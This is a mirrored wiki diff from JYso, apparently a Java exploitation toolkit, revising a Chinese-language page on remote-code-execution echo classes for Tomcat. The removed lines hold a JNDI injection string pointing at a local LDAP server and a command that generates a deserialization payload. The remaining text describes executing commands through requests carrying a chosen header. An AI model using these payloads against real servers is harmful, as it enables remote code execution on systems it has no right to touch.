mirror of
https://github.com/qi4L/JYso.git
synced 2026-09-26 16:51:52 +08:00
Updated 4、JAVA RCE Echo (markdown)
+2
-13
@@ -18,22 +18,11 @@
|
||||
在回显类前面加大写C即是构造方法实现,反之则在静态代码块中。
|
||||
|
||||
加这个的原因是重名类静态代码加载只会执行一次,如果你需要打入一次重复使用就加大写的C。
|
||||
例如 `EX-CTomcatEcho`
|
||||
例如 `EX-CTomcatEcho`。
|
||||
|
||||
# 使用说明
|
||||
|
||||
这个功能同时支持 JNDI Injection与恶意类的生成
|
||||
|
||||
+ JNDIExploit
|
||||
```
|
||||
${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho}
|
||||
```
|
||||
|
||||
+ ysoserial
|
||||
```
|
||||
java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho"
|
||||
```
|
||||
|
||||
这个功能同时支持 JNDI Injection与恶意类的生成。
|
||||
|
||||
对于 Echo 类的回显,是基于在线程组中找到带有指定 Header 头部的请求、执行命令并回显的利用方式。
|
||||
|
||||
|
||||
Reference in New Issue
Block a user